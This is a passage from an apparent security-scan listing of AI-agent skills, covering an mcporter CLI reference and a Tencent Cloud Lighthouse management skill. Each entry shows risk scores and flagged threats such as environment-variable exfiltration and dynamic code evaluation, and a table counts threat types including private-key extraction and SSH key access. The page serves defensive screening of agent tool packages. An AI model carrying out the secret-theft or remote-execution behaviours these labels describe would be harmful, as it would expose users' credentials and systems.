Reference documentation for the mcporter CLI tool, which provides command-line access to list, configure, authenticate, and call MCP (Model Context Protocol) servers and their tools via HTTP or stdio interfaces.

Threats detected:

  • [CRITICAL] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


176. ๐Ÿšจ Tencent Cloud Lighthouse by unknown

Risk: 63% โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–‘โ–‘โ–‘โ–‘ Downloads: 0

้€š่ฟ‡ mcporter + lighthouse-mcp-server ็ฎก็†่…พ่ฎฏไบ‘่ฝป้‡ๅบ”็”จๆœๅŠกๅ™จ๏ผŒๆไพ›่‡ชๅŠจๅŒ–ๅฎ‰่ฃ…้…็ฝฎใ€ๅฎžไพ‹็ฎก็†ใ€็›‘ๆŽงๅ‘Š่ญฆใ€้˜ฒ็ซๅข™็ฎก็†ๅ’Œ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๅŠŸ่ƒฝ

Threats detected:

  • [HIGH] Dynamic Code Evaluation
  • [CRITICAL] Environment Variable Exfiltration
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection
  • [HIGH] LLM Semantic Detection

Full report โ†’


Most Common Threat Types

Threat Count
LLM Semantic Detection 1561
Dynamic Code Evaluation 165
Startup Failure (non-executable) 151
Outbound Data Transfer 86
Hidden Command Execution 33
Private Key Extraction 23
Environment Variable Exfiltration 18
Base64 Encoded Payload 10
SSH Key Access 6
Remote Script Execution 6

ClawSec | ClawSearch | npx clawsearch-guard <skill>